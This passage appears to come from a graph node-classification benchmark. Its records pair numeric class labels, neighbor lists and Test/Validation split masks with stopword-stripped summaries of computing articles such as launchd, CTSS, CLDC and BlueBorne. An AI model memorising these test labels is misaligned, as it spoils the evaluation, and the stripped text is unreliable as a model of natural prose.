    "text": "Global_Resource_Serialization:global resource serialization global resource serialization grs component within ibm z/os operating system responsible enabling fair access serially reusable computing resources datasets tape drives virtual resources lists queues control blocks programs request exclusive access resource means program subsequent requesting programs blocked program given access resource usually requested program needs update resource shared access means multiple programs given access resource usually requested program needs query state resource grs manages requests fifo first in/first order grs manages resources three different levels scoping order grs serialize resources multiple systems systems must clustered several options enable clustering ca inc. licenses product called multi-image manager ca-mim contains component called multi-image integrity mii used implement similar functions grs",
    "neighbors": [
      2168,
      3323,
      7053
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8873,
    "label": 4,
    "text": "SNMPTT:snmptt snmptt snmp trap handler written perl use net-snmp/ucd-snmp snmptrapd program received traps translated user friendly messages using variable substitution output stdout text log file syslog nt event log mysql linux/windows postgresql odbc database user defined programs also executed snmptt downloaded sourceforge project page project web page information snmptt available following books",
    "neighbors": [
      1859,
      8582,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 8874,
    "label": 9,
    "text": "Translation_unit_(programming):translation unit programming c c++ programming language terminology translation unit ultimate input c c++ compiler object file generated casual usage sometimes referred compilation unit translation unit roughly consists source file processed c preprocessor meaning header files listed codice_1 directives literally included sections code within codice_2 may included macros expanded c program consists units called source files preprocessing files addition source code includes directives c preprocessor translation unit output c preprocessor – source file preprocessed preprocessing notably consists expanding source file recursively replace codice_1 directives literal file declared directive usually header files possibly source files result step preprocessing translation unit steps include macro expansion codice_4 directives conditional compilation codice_5 directives among others translates preprocessing translation unit translation unit translation unit compiler generates object file processed linked possibly object files form executable program note preprocessor principle language agnostic lexical preprocessor working lexical analysis level – parsing thus unable processing specific c syntax input compiler translation unit thus see preprocessor directives processed compiling starts given translation unit fundamentally based file actual source code fed compiler may appear substantially different source file programmer views particularly due recursive inclusion headers translation units define scope roughly file scope functioning similarly module scope c terminology referred internal linkage one two forms linkage c. names functions variables declared outside function block may visible either within given translation unit case said internal linkage – visible linker – may visible object files case said external linkage visible linker c notion modules however separate object files hence also translation units used produce object files function similarly separate modules source file include source files internal linkage translation unit scope may thought file scope including header files bulk project code typically held files codice_6 suffix codice_7 codice_8 codice_9 c++ codice_7 used conventionally files intended included typically codice_11 suffix codice_12 codice_13 also used c++ codice_11 common even c++ generally contain function variable definitions avoid name conflicts headers included multiple source files often case header files often included header files standard practice codice_6 files project include least one codice_11 file",
    "neighbors": [
      1952,
      5635,
      5896,
      6664,
      7273,
      10510,
      9587,
      3386,
      2045,
      5630
    ],
    "mask": "Test"
  },
  {
    "node_id": 8875,
    "label": 7,
    "text": "Zetta_(cloud_backup):zetta cloud backup zetta american company specializing cloud-based backup disaster recovery small mid-sized businesses enterprises msps zetta provides cloud backup disaster recovery services on-premises backup archiving notable network efficient data transfer uses lightweight agent software replicate customer data creating second copy zetta bi-coastal enterprise-grade data centers available recovery data loss event server crash natural disaster zetta end-to-end disaster recovery service provides deployment-to-failback coverage features upfront network firewall vpn connectivity configuration automated disaster recovery testing software supports windows linux mac plug-ins sql ms exchange hyper-v vmware netapp filers zetta awarded several patents backup disaster recovery technology including minimizing network bandwidth replication/backup ensuring data replicated bit bit source system able scale internet volumes data zetta agent eliminates network round trips client side cache server state extensive parallelism wan optimization zetta also provides mountable backup zetta founded 2008 sunnyvale california jeff whitehead lou montulli jason harrison current ceo mike grossman investors zetta include sigma partners foundation capital industry ventures",
    "neighbors": [
      6514,
      3366
    ],
    "mask": "Test"
  },
  {
    "node_id": 8876,
    "label": 2,
    "text": "OS/8:os/8 os/8 primary operating system used digital equipment corporation pdp-8 minicomputer pre-os/8 earlier pdp-8 operating systems other/related dec operating systems os/78 os/278 os/12 latter virtually identical version os/8 used digital pdp-12 computer digital released os/8 images non-commercial purposes emulated simh os/8 provided simple operating environment commensurate complexity scale pdp-8 computers ran i/o supported via series supplied drivers used polled interrupt-driven techniques device drivers cleverly written could occupy one two memory pages 128 12-bit words able run page field 0 often required considerable cleverness use opr instruction 7xxx small negative constants memory-resident footprint os/8 256 words 128 words top field 0 128 words top field 1 rest operating system usr user service routines swapped memory transparently regard user program needed early versions os/8 rudimentary command line interpreter basic commands get save run assign deassign odt version 3 added sophisticated overlay called ccl concise command language implemented many commands os/8 ccl directly patterned ccl found digital pdp-10 systems running tops-10 fact much os/8 software system deliberately designed mimic closely possible tops-10 operating environment ccl command language later used pdp-11 computers running rt-11 rsx-11 rsts/e providing similar user operating environment across three architectures pdp-8s pdp-10s pdp-11s basic os ccl implemented many rather sophisticated commands many still exist modern command languages even ms-dos windows unix-like operating systems example compile command would automatically find right compiler given source file start compile/assemble/link cycle assign deassign commands allowed one use logical device names program instead physical names required ms-dos example program could write device flop aaa.txt first assign flop rxa2 file would created physical device rxa2 second floppy disk drive vax/vms commodore amiga operating system amigaos oses built around tripos made considerable use flexible feature set command capable setting many system options albeit crude method patching locations system binary code one command os-78 set sys os8 re-enabled monitor commands part os-78 build command could reconfigure os fly even adding device drivers often without reboot os os boot hard disk present command prompt half second os/8 supported simple flat file system variety mass storage devices including filenames pdp-8 took form ffffff.xx f represents uppercase alphanumeric character filename x represents upper-case alphanumeric character extension filetype contents given file stored contiguously single extent pip included option compress squeeze filesystem unallocated space moved single extent end disk could invoked squish ccl command much mung could used run teco macro os/8 volumes limited maximum storage size 4096 blocks 256 12-bit words rk05 2.4mb moving-head disk exceeded size 1.6 million words storage rk05 cartridges divided two partitions example first rk05 system would known rka0 sy rkb0 division commonly thought mean upper surface lower surface incorrect fact outer cylinders inner cylinders ascii files stored 3 8-bit characters per pair 12-bit words characters 1 2 right words 1 2 bits 0-3 4-7 3rd character stored leftmost bits pair words os/8 allocated pdp-8 12 bit words storing dates per y3b recognized cos-310 developed cusps commonly-used system programs utilities supplied os/8 included single-user basic two multi-user versions basic available options single-user basic used several overlays provide full functionality language os/8 booted dectape noticeable delay occurred time basic required switch overlays needed read tape multi-user versions basic edu20 edu25 differed whether supported block-replaceable devices dectape disk due cost constraints many pdp-8s punched paper tape readers mass-storage i/o device edu20 loaded paper tape could output paper tape writer machine one whereas edu25 understood structure filesystem could load dectape disk could create files dectape disk could run multiple basic programs simultaneously using primitive task-scheduler round-robined among attached terminals memory always tight pdp-8 used core memory extremely expensive compared ram technology came along years later mere 8k 12-bit words edu20 could support 4 terminals although memory recommended edu25 required additional 4k memory bank minimum 12k code contained disk device driver filesystem handler running edu20 edu25 self-contained programs n't use os/8 system calls immediately upon invoked os/8 command interpreter would overwrite os/8 entire resident portion 256 words upon startup edu25 would save contents memory dectape disk restore exited edu20 could targeted hardware configurations without block-replaceable device also rather complete fortran iv compiler available extra cost compiler generated code optional fpp-8 floating-point processor essentially separate cpu sharing memory pdp-8 cpu fpp-8 option installed fortran runtime code would detect use fpp-8 run main program code pdp-8 cpu would run i/o processor fpp-8 runtime code would instead call fpp-8 interpreter running pdp-8 cpu program would still run considerably reduced speed fortran iv compiler version 1 interesting bug loops counted incorrectly loops would count 1,2,3,5,6,7 … skipping 4 quick patch released fix",
    "neighbors": [
      2432,
      2179,
      6155,
      1804,
      6797,
      273,
      10257,
      6675,
      5397,
      8729,
      8474,
      8732,
      9759,
      1952,
      9762,
      7076,
      7983,
      6448,
      6837,
      4409,
      6075,
      3650,
      2507,
      9166,
      5328,
      978,
      11604,
      1750,
      477,
      10590,
      1253,
      10475,
      3056,
      5492,
      6772,
      3960
    ],
    "mask": "None"
  },
  {
    "node_id": 8877,
    "label": 2,
    "text": "Launchd:launchd launchd init operating system service management daemon created apple computer part macos efforts port launchd freebsd derived systems two main programs launchd system launchd launchctl launchd manages daemons system user level similar xinetd launchd start daemons demand similar watchdogd launchd monitor daemons make sure keep running launchd also replaced init pid 1 macos result responsible starting system boot time configuration files define parameters services run launchd stored launchagents launchdaemons subdirectories library folders property list-based files approximately thirty different keys set launchd knowledge configuration files ability read responsibility launchctl launchctl command line application talks launchd using ipc knows parse property list files used describe launchd jobs serializing using specialized dictionary protocol launchd understands launchctl used load unload daemons start stop launchd controlled jobs get system utilization statistics launchd child processes set environment settings launchd two main tasks first boot system second load maintain services simplified view mac os x tiger system startup powerpc mac intel mac efi replaces open firmware codice_1 replaces bootx step 4 startup scripts scan different directories jobs run two different directories scanned directories kept typical library directories mac os x. launchd different systemstarter may actually launch daemons boot time key launchd similar xinetd idea launch demand daemons launchd scans job plists boot time reserves listens ports requested jobs indicated plist ondemand key daemon actually loaded time rather launchd listen port start daemon needed shut daemon loaded launchd keep track make sure running needed way like watchdogd shares watchdogd requirement processes attempt fork daemonize process goes background launchd lose track attempt relaunch consequently mac os x tiger boots much faster previous releases system register daemons run actually launch fact progress bar appears boot time placebo application named waitingforloginwindow really show anything passage time hardest part manage launchd boot dependencies systemstarter simple system dependencies used uses requires provides keys plist startup item two main strategies creating launch dependencies tiger using ipc allow daemons talk amongst work watch files paths changes using ipc much subtle systemstarter keys requires work developer may lead cleaner quicker startups systemstarter still supported os x mountain lion removed os x yosemite launchd control services centralized launchctl application launchctl take commands command line standard operate interactive mode superuser privileges launchctl used make changes global scale set launchctl commands made permanent stored /etc/launchd.conf per-user ~/.launchd.conf file appears considered supported existing version macos launchctl communicates launchd via mach-specific ipc mechanism property list plist type file launchd uses program configuration launchd scans folder job submitted launchctl reads plist file describes program run list often used keys follows keys optional unless otherwise noted full list see apple manpage codice_5 name key sockets placed environment job run file descriptor socket available environment variable differs systemd socket activation name socket definition inside job configuration hardcoded application protocol less flexible although systemd require daemon hardcode starting file descriptor 2014 3 software designed coded dave zarzycki apple company planned following superseded os x environments – – things superseded launchd introduced mac os x v10.4 tiger 2005 r. tyler croy ported launchd freebsd part google summer code project could run pid 1 session init commonly used platform 2006 ubuntu linux distribution considered using launchd option rejected source code subject apple public source license – described inescapable licence problem ubuntu instead developed switched service management tool upstart august 2006 apple relicensed launchd apache license version 2.0 effort make adoption open source developers easier linux distributions use systemd upstart continue init bsds also continue init december 2013 r. tyler croy announced intent resume work port launchd freebsd openlaunchd github repo subsequently rose activity last wayback machine capture mac os forge area launchd june 2012 recent open source version apple 842.92.1 code os x 10.9.5 2014 os x 10.10 ios 8 apple moved code launchd closed source libxpc august 2015 jordan hubbard kip macy announced nextbsd based freebsd-current kernel adding mach ipc libdispatch notifyd asld launchd components derived darwin apple open-source code os x. apple developer apple developer retired documents library links",
    "neighbors": [
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      4218,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      3750,
      5292,
      1710,
      3758,
      3766,
      2232,
      9912,
      700,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      231,
      9451,
      9455,
      2288,
      7928,
      8441,
      2811,
      4349,
      7422,
      11521,
      2819,
      1796,
      10512,
      5397,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      4933,
      9035,
      1878,
      4457,
      7561,
      9100,
      9109,
      1439,
      2467,
      11689,
      7626,
      6093,
      7118,
      3035,
      4571,
      4068,
      4581,
      5093,
      487,
      10221,
      5619,
      11257,
      7163,
      8700,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8878,
    "label": 1,
    "text": "Bulk_Copy_Program:bulk copy program bulk copy program bcp command-line tool used import export data microsoft sql server sybase database tool often efficient recent gui-based applications dts import extract data common uses bcp",
    "neighbors": [
      10340,
      3366,
      7022,
      11571,
      2901,
      11030,
      8539
    ],
    "mask": "None"
  },
  {
    "node_id": 8879,
    "label": 2,
    "text": "Compatible_Time-Sharing_System:compatible time-sharing system compatible time-sharing system ctss one first time-sharing operating systems developed mit computation center ctss first demonstrated mit ibm 709 november 1961 service mit users began summer 1963 operated 1973 part time mit influential project mac also ran ctss service system spread beyond two sites ctss described paper presented 1962 spring joint computer conference greatly influenced design early time-sharing systems john backus said 1954 summer session mit time sharing big computer could used several small ones would need reading station user computers time like ibm 704 powerful enough implement system end 1958 mit computation center nevertheless added typewriter input 704 intent programmer operator could obtain additional answers machine time-sharing basis programs using machine simultaneously june 1959 christopher strachey published paper time sharing large fast computers unesco information processing conference paris envisaged programmer debugging program console like teletype connected computer another program running computer time debugging programs important problem time batch processing often took day submitting changed code getting results john mccarthy wrote memo mit preliminary study committee working committee established mit develop time sharing committees envisaged many users using computer time decided details implementing system mit started development system july 1961 time sharing commands become operational computation center ibm 709 november 1961 fernando j. corbató demonstrated mit called experimental time-sharing system may 3 1962 f. j. corbató m. m. daggett r. c. daley published paper system spring joint computer conference robert c. daley peter r. bos least 6 programmers implemented operating system partly based fortran monitor system system used ibm 7090 modified herbert m. teager added 3 flexowriters user consoles maybe timer 3 users two tape units one user file directory one dumping core program memory also one tape unit system commands disk drives memory 27 k words 36-bit words users 5 k words supervisor operating system input consoles written buffers supervisor interrupts return character received control given supervisor dumped running code tape decided run next console commands implemented time login logout input edit fap mad madtrn load use start skippm listf printf xdump xundump became initial version compatible time-sharing system apparently first ever public demonstration time-sharing claims refer special-purpose systems known papers published compatibility ctss background jobs run computer generally used compute resources time-sharing functions ctss used modified ibm 7090 mainframe computer two 32,768 32k 36-bit-word banks core memory instead normal one one bank reserved time-sharing supervisory program user programs ctss protected-mode kernel supervisor functions a-core memory bank could called software interrupts like modern operating systems causing memory-protection interrupts used software interrupts processor allocation scheduling quantum time unit 200 ms controlled multilevel feedback queue also special memory-management hardware clock interrupt ability trap certain instructions ctss first assembler fap compiler mad also fortran ii code could translated mad code later half system written mad later programming languages like lisp version algol every user one directory also directories groups people problem number file two names second name similar extension today first file could one four modes temporary permanent read-only class 1 read-only class 2 read-only class 2 differed user could change mode files files could also linked directories user directory directory listing listf input-output hardware mostly standard ibm peripherals included six data channels connecting multics also developed project mac started 1960s successor ctss – turn inspired development unix 1969 one technical terms inherited systems ctss daemon incompatible timesharing system another early revolutionary influential mit time-sharing system produced people disagreed direction taken ctss later multics name parody ctss later name unix parody multics",
    "neighbors": [
      512,
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      5158,
      557,
      7217,
      10803,
      7733,
      4151,
      9784,
      10809,
      573,
      576,
      8262,
      10333,
      97,
      9829,
      6248,
      8298,
      6772,
      7285,
      9335,
      2168,
      1147,
      2172,
      3197,
      1150,
      2179,
      10883,
      6797,
      9361,
      10387,
      9366,
      6296,
      9370,
      7325,
      9887,
      7848,
      3248,
      6837,
      4799,
      1219,
      8388,
      6342,
      9932,
      5840,
      1235,
      7382,
      8410,
      5348,
      1253,
      1776,
      5363,
      2811,
      9468,
      2813,
      10499,
      1804,
      11023,
      273,
      11539,
      789,
      5397,
      8474,
      3359,
      10016,
      2345,
      1323,
      7983,
      7477,
      823,
      10040,
      4409,
      7483,
      8509,
      11075,
      1349,
      4423,
      5456,
      5457,
      11601,
      7507,
      10590,
      863,
      868,
      3429,
      6502,
      8551,
      879,
      5492,
      3960,
      10110,
      8063,
      2432,
      6529,
      4996,
      394,
      3978,
      7053,
      8077,
      7057,
      11667,
      11673,
      8092,
      6557,
      8609,
      421,
      11184,
      950,
      1976,
      5562,
      6075,
      6078,
      9151,
      3522,
      8136,
      6128,
      5619,
      10235
    ],
    "mask": "None"
  },
  {
    "node_id": 8880,
    "label": 9,
    "text": "Connected_Device_Configuration:connected device configuration connected device configuration cdc specification framework java applications describing basic set libraries virtual-machine features must present implementation cdc combined one profiles give developers platform building applications embedded devices ranging pagers set-top boxes cdc developed java community process jsr 36 cdc 1.0.2 jsr 218 cdc 1.1.2 devices support cdc typically include 32-bit cpu 2 mb ram 2.5 mb rom available java application environment reference implementations cdc profiles based linux running intel-compatible pc optimized implementations available variety cpus operating systems profile set apis support devices different capabilities resources within cdc framework provide complete java application environment three profiles available build incrementally allow application developers choose appropriate programming model particular device basic cdc family profiles hackedis set java apis tuned low-footprint devices limited resources need graphical user interface system provides complete java application environment consumer products embedded devices without standards-based gui system version 1.1.2 specified jsr 219 implements subset java se 1.4.2 including set security-related optional packages java authentication authorization service jaas java secure socket extension jsse java cryptography extension jce personal basis profile provides superset foundation profile apis supports similar set devices lightweight graphical user interface requirements framework building lightweight graphical user interface components provided support awt classes heavyweight gui components provided components assume availability pointing device mouse specification described jsr 217 used products require standards-based graphical user interface without full awt compatibility xlet application programming model used application development within profile including advanced content blu-ray discs conforming bd-j specification personal profile extends personal basis profile gui toolkit based awt provides complete java application environment full awt support intended higher end devices pdas smart communicators set-top boxes game consoles automobile dashboard electronics recommended profile porting legacy personaljava-based applications specification described jsr 62 uses applet programming model application development cdc supports number optional packages allow developers access specific pieces extra functionality within restricted resource constraints java device",
    "neighbors": [
      4960,
      3561,
      1776,
      8882,
      823,
      3416
    ],
    "mask": "None"
  },
  {
    "node_id": 8881,
    "label": 4,
    "text": "Security_controls:security controls security controls safeguards countermeasures avoid detect counteract minimize security risks physical property information computer systems assets classified several criteria example according time act relative security incident according nature example similar categorization distinguishes control involving people technology operations/processes field information security controls protect confidentiality integrity and/or availability information so-called cia triad systems controls referred frameworks standards frameworks enable organization manage security controls across different types assets consistency numerous information security standards promote good security practices define frameworks systems structure analysis design managing information security controls well known outlined iso/iec 27001 specifies 114 controls 14 groups federal information processing standards fips apply us government agencies however certain national security systems purview committee national security systems managed outside standards federal information processing standard 200 fips 200 minimum security requirements federal information information systems specifies minimum security controls federal information systems processes risk-based selection security controls occurs catalog minimum security controls found nist special publication sp 800-53 fips 200 identifies 17 broad control families starting revision 3 800-53 program management controls identified controls independent system controls necessary effective security program starting revision 4 800-53 eight families privacy controls identified align security controls privacy expectations federal law telecommunications security controls defined security services part osi reference model technically aligned model widely recognized wide range frameworks standards looking internal business inter-business controls including",
    "neighbors": [
      5636,
      11526,
      5774,
      5780,
      8471,
      7979,
      11567,
      2737,
      10034,
      3125,
      1479,
      4936,
      4689,
      1369,
      4448,
      612,
      7528,
      3447,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 8882,
    "label": 9,
    "text": "Connected_Limited_Device_Configuration:connected limited device configuration connected limited device configuration cldc specification framework java applications describing basic set libraries virtual-machine features must present implementation cldc combined one profiles give developers platform building applications embedded devices limited resources pagers mobile phones cldc developed java community process jsr 30 cldc 1.0 jsr 139 cldc 1.1 cldc designed devices limited processing power memory graphical capability devices typically following features compared java se environment several apis absent entirely apis altered code requires explicit changes support cldc particular certain changes n't absence classes interfaces actually change signatures existing classes base class library example absence codice_1 interface appear base class library due restrictions reflection usage codice_2 classes normally implement codice_1 therefore implement tagging interface examples limitations depend version used features re-introduced version 1.1 cldc profile set apis support devices different capabilities resources within cldc framework provide complete java application environment specific profiles devices ranging vending machines set-top boxes mobile phone profile midp prevalent mobile information device profile profile designed cell phones two versions midp available specified jsr 37 midp 1.0 jsr 118 midp 2.0 versions provide lcd oriented gui api midp 2.0 including basic 2d gaming api applications written use profile called midlets many cell phones come midp implementation popular platform downloadable cell phone games information module profile specified jsr 195 designed vending machines network cards routers telephone boxes systems either simple display form limited two way network access apis application creation storage network access defined subset javax.microedition.io rms midlet packages midp siemens mobile nokia put forward specification jcp doja profile designed docomo i-mode mobile phone ntt docomo digital set top box profile specified jsr 242 designed cable market also referred onramp profile based subset opencable application platform ocap defines set apis development applications set-top boxes similar devices profile consists subsets cdc personal basis profile including support awt xlet file access network apis well several media-related interfaces ocap whole profile encompassed 31 java packages approximately 1500 apis pda optional packages specified jsr-75 designed pdas palm windows ce devices specification defines two independent packages represent important features found many pdas mobile devices packages",
    "neighbors": [
      4960,
      321,
      10373,
      3561,
      3626,
      1776,
      8880,
      690,
      5810,
      9011,
      5943
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8883,
    "label": 9,
    "text": "Weblocks:weblocks weblocks advanced web framework common lisp web pages built simple widgets analogous gui widgets used application toolkits widgets written lisp using cl-who meta-language framework supports delimited continuations control flow full-stack framework since comes built-in database persistence systems programming weblocks similar continuation-passing style frameworks like seaside html http level details abstracted especially regard ajax form parameters although access easily available weblocks active development user community major lisp web-framework uncommon web extensions lisp lines built atop",
    "neighbors": [
      1920,
      4865,
      2438,
      3462,
      8582,
      9865,
      1802,
      2062,
      9614,
      2576,
      148,
      1812,
      9877,
      4122,
      10395,
      6941,
      9245,
      10526,
      8739,
      3876,
      1448,
      4777,
      9128,
      4779,
      5165,
      7983,
      4529,
      7987,
      692,
      5048,
      6201,
      6074,
      6969,
      7867,
      190,
      8258,
      8771,
      8644,
      9666,
      4550,
      1353,
      11083,
      8908,
      1613,
      595,
      84,
      1365,
      9299,
      2392,
      4056,
      7896,
      6493,
      7267,
      102,
      6502,
      3176,
      8554,
      2667,
      8691,
      119,
      3705,
      11259,
      4606
    ],
    "mask": "Test"
  },
  {
    "node_id": 8884,
    "label": 1,
    "text": "MathSciNet:mathscinet mathscinet searchable online bibliographic database created american mathematical society 1996 contains contents journal mathematical reviews mr since 1940 along extensive author database links mr entries citations full journal entries links original articles contains almost 3 million items 1.7 million links original articles along parent publication mathematical reviews mathscinet become essential tool researchers mathematical sciences access database subscription generally available individual researchers affiliated larger subscribing institution first 40 years existence traditional typesetting used produce mathematical reviews journal starting 1980 bibliographic information reviews produced print electronic form formed basis first purely electronic version called mathfile launched 1982 enhancements added next 18 years current version known mathscinet went online 1996 unlike abstracting databases mathscinet takes care uniquely identify authors author search allows user find publications associated given author record even multiple authors exactly name person publishes multiple names name variants mathematical reviews personnel sometimes even contact authors ensure mathscinet correctly attributed papers mathscinet contains information 3 million articles eight hundred thousand authors indexed 1800 mathematical journals many abstracted cover-to-cover addition reviews bibliographical information selected articles included many engineering computer science applied journals abstracted mathscinet selection done editors mathematical reviews editors accept suggestions cover additional journals reconsider missing articles inclusion",
    "neighbors": [
      11679
    ],
    "mask": "Test"
  },
  {
    "node_id": 8885,
    "label": 4,
    "text": "Table_of_costs_of_operations_in_elliptic_curves:table costs operations elliptic curves elliptic curve cryptography popular form public key encryption based mathematical theory elliptic curves points elliptic curve added form group addition operation article describes computational costs group addition certain related operations used elliptic curve cryptography algorithms next section presents table time-costs possible operations elliptic curves columns table labelled various computational operations rows table different models elliptic curves operations considered poem dbl doubling add addition madd mixed addition addition input scaled z -coordinate 1. mdbl mixed doubling doubling input scaled z coordinate 1 tpl tripling dbl+add combined double add step /poem see adding add doubling dbl points elliptic curves defined see group law importance doubling speed scaler multiplication discussed table information possible operations elliptic curves see http //hyperelliptic.org/efd/g1p/index.html different assumptions multiplication addition inversion elements fixed field time-cost operations varies table assumed means 100 multiplications required invert element one multiplication required compute square element multiplication needed multiply element parameter *param constant *const add two elements information results obtained different assumptions see http //hyperelliptic.org/efd/g1p/index.html applications elliptic curve cryptography elliptic curve method factorization ecm necessary consider scalar multiplication n p one way compute successively faster use double-and-add method e.g 5 p 2 2 p p general compute k p write formula_2 k 0,1 formula_3 k 1 formula_4 note simple algorithm takes 2l steps step consists doubling k ≠ 0 adding two points one reasons addition doubling formulas defined furthermore method applicable group group law written multiplicatively double-and-add algorithm instead called square-and-multiply algorithm",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 8886,
    "label": 4,
    "text": "BlueBorne_(security_vulnerability):blueborne security vulnerability blueborne type security vulnerability bluetooth implementations android ios linux windows affects many electronic devices laptops smart cars smartphones wearable gadgets one example vulnerabilities first reported armis iot security firm 12 september 2017 according armis blueborne attack vector potentially affect devices bluetooth capabilities estimated 8.2 billion devices today 2017 blueborne security vulnerabilities first reported armis iot security firm 12 september 2017 2017 blueborne estimated potentially affect 8.2 billion devices worldwide many devices affected including laptops smart cars smartphones wearable gadgets google provides blueborne vulnerability scanner armis android procedures help protect devices blueborne security vulnerabilities reported september 2017",
    "neighbors": [
      1024,
      5636,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      1083,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      5764,
      2187,
      6797,
      4240,
      2709,
      1688,
      2717,
      9375,
      9904,
      9395,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      823,
      1337,
      6484,
      857,
      1882,
      7515,
      3956,
      9082,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      8627,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      2542,
      507
    ],
    "mask": "Test"
  },
  {
    "node_id": 8887,
    "label": 3,
    "text": "Antarctic_Adventure:antarctic adventure gameplay similar sega turbo plays much slower pace features platform game elements penguin later named penta must reach next station time runs avoiding sea lions breaks ice throughout levels fish jump ice holes caught bonus points game like many early video games ending – player reaches last station game starts first level increased difficulty antarctic adventure followed sequel msx computer 1986 entitled penguin adventure addition penguin character penta son pentarou became mascot konami 1980s made appearances 10 games particularly note appearances parodius series shoot 'em games penta son pentarou appeared medal games like tsurikko penta balloon penta imo hori penta following 2002 released mobile 2001 released three mobiles like may 6 2003 titled part konami taisen colosseum following fishing game penta tsuri boken released i-revo screen game briefly seen introduction gradius rebirth released 2008 wii virtual console 2014 wii u virtual console msx version re-released windows store egg project november 25 2014 japan rumored coin-operated arcade version released konami 1984 existence actual example yet confirmed 1990 konami released japan handheld electronic game antarctic adventure although usually listed south pole literal translation japanese title 2014 antarctic adventure released special version colecovision flashback atgames available dollar general stores games pentarou makes fisherman",
    "neighbors": [
      1763,
      10695,
      4524,
      9006,
      10576,
      6449,
      10931,
      11478,
      1626
    ],
    "mask": "Test"
  },
  {
    "node_id": 8888,
    "label": 3,
    "text": "P.T.O.:p.t.o p.t.o pacific theater operations released japan console strategy video game released koei originally released pc-8801 1989 ported various platforms x68000 1990 msx2 1991 fm towns sega genesis super nes three 1992 players could assume one side pacific theater operations world war ii acting naval commander organizing fleets building new ships appropriating supplies fuel even engaging diplomacy countries player choose one several world war two battles simulate could control entire pacific campaign well japanese attack pearl harbor sequel p.t.o ii released koei 1993 teitoku ketsudan iii never released outside japan p.t.o iv released playstation 2 us europe players must choose one nine scenarios starting game first scenario negotiations breakdown long-term campaign player must win war mid-1941 war declared victory obtained controlling ports eliminating enemy ships scenarios begin midst certain major pacific conflict goal capture defend certain port sink protect number enemy ships scenario goal achieved player continue full campaign player option playing one two major world war ii pacific maritime powers united states allies japan axis countries begin allies two nations whatever point war gameplay begins time non-allied nations convinced ally side significant gifts diplomacy nations also break alliances poor diplomacy lead departure ships loaned navy instance united kingdom breaks allied forces us lose british ships fleet hermes countries behave historically example italy cease member axis 1943 due allied invasion countries available allies power starts control number pacific bases depending scenario begins focus long-term campaign capture enemy territories defending one reducing number ports enemy control zero territories produce fuel materials power controls fuel refers oil ships supplies soldiers materials refer ores metals used base repair ship repair construction new warships money used fund construction aircraft transports fund improvement technologies capturing territories thus increases resources available player denying use enemy power one home port newly manufactured ships aircraft stationed upon completion turn aircraft fuel materials assigned base however depending safety distance trade route resources may arrive certain ports capable 'urgent repair meaning affect small repairs ships docked ports capability control key regions crucial order maintain fighting capabilities one fleet sea less turnaround time ship repair ships damaged combat p.t.o faithfully recreates many actual battleships available pacific war displays ship icon relative ships ships given several attributes fortitude speed anti-air capability anti-ship capability ships also fitted radar search gunnery rockets scouts marines land invasion ships also given overall 'luck rating 1 99 ships survived many conflicts history like enterprise luck rating 99 several types warship available dreadnought battleships battleships cruisers fleet aircraft carriers light carriers destroyers submarines power starts certain number ships type number ships construction usually launching around historical commission date additional ships constructed replace ships previously lost battle either player prior scenario start date ship construction scheduled 6–24 months closer launch date industrial power expended construction materials consumed well dependent type hull built ship ratings chosen design ship class chosen construction cosmetic affect actual ship limitations attributes like actual hull type ships organized fleets comprise 16 ships 16 fleets arranged inactive ships home port one fleet side engage battle one time fleets must attack enemy succession rather fleets rating morale fatigue 0 99 morale goes victories shore leave defeats flagship lost also raised emergency banquet sea fatigue goes every battle crew infected plague ships also individual levels crew experience value starts high japanese low us experience levels gradually increase combat conducting training drills another type ship constructed transports used carrying additional fuel extend fleet range transporting resources territories home ports additional non-controlled shipping fleets constantly active game though displayed tactical maps transport fleets supplying bases protected unlisted destroyers cruisers engage enemy fleet following types aircraft immediately available fighters bombers scouts later game technology levels advanced jet fighters long-range bombers become available aircraft carriers fitted allow jets technology levels sufficient modified carrier carry jet fighters normal fighters long-range bombers launched land bases aircraft deployed bases aircraft carriers although ship types allow scouts launched via catapult aircraft placed bases take defensive role attacking fleet aircraft used scout enemy fleets day enemy fleets found land-based aircraft sortie attack naval fleet begins certain number fictional fleet commanders depending scenario chosen commanders placed command 16 fleets player arranges player creates commanders set rolled scores certain attributes – air command ability sea command ability bravery overall war ability scores range 01 99 total four scores 102 air sea abilities affect actual combat performance ships planes commander control bravery affects commander decision making fleet ai control war overall rating useful comes convincing army military officials agree submissions objectives budgeting industrial production computer gaming world 1993 approved genesis version p.t.o suitable core group strategy wargamers normally play videogames criticizing inadequate documentation reported game randomized campaigns provided 200-300 hours play time—more comparatively priced cartridge magazine favorably concluded p.t.o establishes new trend video gaming",
    "neighbors": [
      10316
    ],
    "mask": "Test"
  },
  {
    "node_id": 8889,
    "label": 2,
    "text": "Time_Sharing_Operating_System:time sharing operating system time sharing operating system tsos discontinued operating system rca mainframe computers spectra 70 series tsos originally designed 1968 spectra 70/46 modified version 70/45 tsos quickly evolved virtual memory operating system vmos 1970 vmos continued supported later rca 3 rca 7 computer systems rca computer business 1971 sold computer business sperry corporation sperry renamed tsos vs/9 continued market early 1980s mid seventies enhanced version tsos called bs2000 offered german company siemens sperry – unisys – discontinued vs/9 bs2000 variant called bs2000/osd still offered fujitsu siemens computers used mainframe customers primarily europe name suggests tsos provided time sharing features beyond provided common user interface time sharing batch big advantage ibm os/360 successors mvs os/390 z/os",
    "neighbors": [
      6529,
      2179,
